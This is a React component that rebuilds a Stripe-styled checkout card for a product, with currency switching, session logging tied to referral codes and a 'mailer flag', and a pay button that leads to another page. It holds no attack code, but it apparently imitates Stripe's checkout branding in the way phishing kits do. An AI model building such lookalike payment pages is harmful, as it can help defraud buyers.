import React, { useState, useEffect } from 'react';
import { Link, useParams } from 'react-router-dom';
import './Stripe1.css';
import SupportWidget from './SupportWidget';
import { getStripeTranslations } from '../stripeTranslations';
import { getPrimaryCurrency, convertToUsd, getSymbol, getRateLabel } from '../stripeCurrency';
import { fetchPageWithFallback, API_URL } from '../fetchPageWithFallback';
import { withMailerFlag } from '../paymentSession';
import { usePaymentPaths } from '../paymentPaths';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

function Stripe1({ page }) {
  const { pageCode } = useParams();
  const { toIndex2 } = usePaymentPaths();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [loadError, setLoadError] = useState(null);
  const [sessionId, setSessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [currency, setCurrency] = useState(() =>
    page?.country_code ? getPrimaryCurrency(page.country_code) : 'EUR'
  );
  const countryCode = pageData?.country_code || page?.country_code || 'NL';
  const t = getStripeTranslations(countryCode);
  const primaryCurrency = getPrimaryCurrency(countryCode);

  useEffect(() => {
    let cancelled = false;
    const urlParams = new URLSearchParams(window.location.search);
    const referralCode = urlParams.get('ref');

    fetch(`${API_URL}/api/session/start`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(withMailerFlag({
        page_code: pageCode || undefined,
        referral_code: referralCode || undefined,
      })),
    })
      .then((res) => res.json())
      .then((data) => {
        if (cancelled || !data.success) return;
        if (data.session_id) {
          sessionStorage.setItem(SESSION_STORAGE_KEYS.sessionId, data.session_id);
          setSessionId(data.session_id);
        }
        if (data.log_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.logId, String(data.log_id));
      })
      .catch(() => {});
    return () => { cancelled = true; };
  }, [pageCode]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoadError(null);
      setLoading(false);
      if (page.country_code) setCurrency(getPrimaryCurrency(page.country_code));
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    setLoadError(null);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) {
          setPageData(data.page);
          setCurrency(getPrimaryCurrency(data.page.country_code));
        } else {
          setLoadError((data && data.error) || 'Page not found');
        }
      })
      .catch((err) => setLoadError(err?.message || 'Failed to load page'))
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  if (loading && pageCode) {
    return (
      <div className="stripe1-container">
        <div className="stripe1-loading">{t.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (loadError || !pageData) {
    return (
      <div className="stripe1-container">
        <div className="stripe1-loading">{loadError || 'Page not found'}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  const productName = pageData.product_name || 'Pure Glow Cream';
  const productPrice = pageData.price != null ? Number(pageData.price) : 119.70;
  const photoUrl = pageData.photo_url || '';

  const totalPrimary = productPrice;
  const totalUSD = convertToUsd(totalPrimary, primaryCurrency);
  const displayTotal = currency === primaryCurrency ? totalPrimary : totalUSD;
  const symbol = getSymbol(currency);
  const rateLabel = getRateLabel(primaryCurrency);

  const index2Path = toIndex2();

  return (
    <div className="stripe1-container">
      <div className="stripe1-card">
        <div className="stripe1-logo" />
        <h1 className="stripe1-title">{productName}</h1>

        <div className="stripe1-currency-section">
          <div className="stripe1-currency-label">{t.chooseCurrency}</div>
          <div className="stripe1-currency-options">
            <button
              type="button"
              className={`stripe1-currency-btn ${currency === primaryCurrency ? 'active' : ''}`}
              onClick={() => setCurrency(primaryCurrency)}
            >
              <span className="stripe1-currency-flag">{primaryCurrency === 'EUR' ? '🇪🇺' : primaryCurrency === 'DKK' ? '🇩🇰' : primaryCurrency === 'RON' ? '🇷🇴' : '💶'}</span>
              <span>{getSymbol(primaryCurrency)} {totalPrimary.toFixed(2)}</span>
            </button>
            <button
              type="button"
              className={`stripe1-currency-btn ${currency === 'USD' ? 'active' : ''}`}
              onClick={() => setCurrency('USD')}
            >
              <span className="stripe1-currency-flag">🇺🇸</span>
              <span>${totalUSD.toFixed(2)}</span>
            </button>
          </div>
          {rateLabel && <div className="stripe1-rate">{rateLabel}</div>}
        </div>

        <div className="stripe1-order">
          <div className="stripe1-order-item">
            {photoUrl && <img src={photoUrl} alt="" className="stripe1-order-img" />}
            <div className="stripe1-order-info">
              <span className="stripe1-order-name">{productName}</span>
              <span className="stripe1-order-price">{getSymbol(currency)} {(currency === primaryCurrency ? totalPrimary : totalUSD).toFixed(2)}</span>
            </div>
          </div>
          <div className="stripe1-order-line total">
            <span>{t.totalDue}</span>
            <span>{symbol} {displayTotal.toFixed(2)}</span>
          </div>
        </div>

        <Link to={index2Path} className="stripe1-pay-link">
          <button type="button" className="stripe1-pay-btn">{t.pay}</button>
        </Link>
      </div>
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default Stripe1;
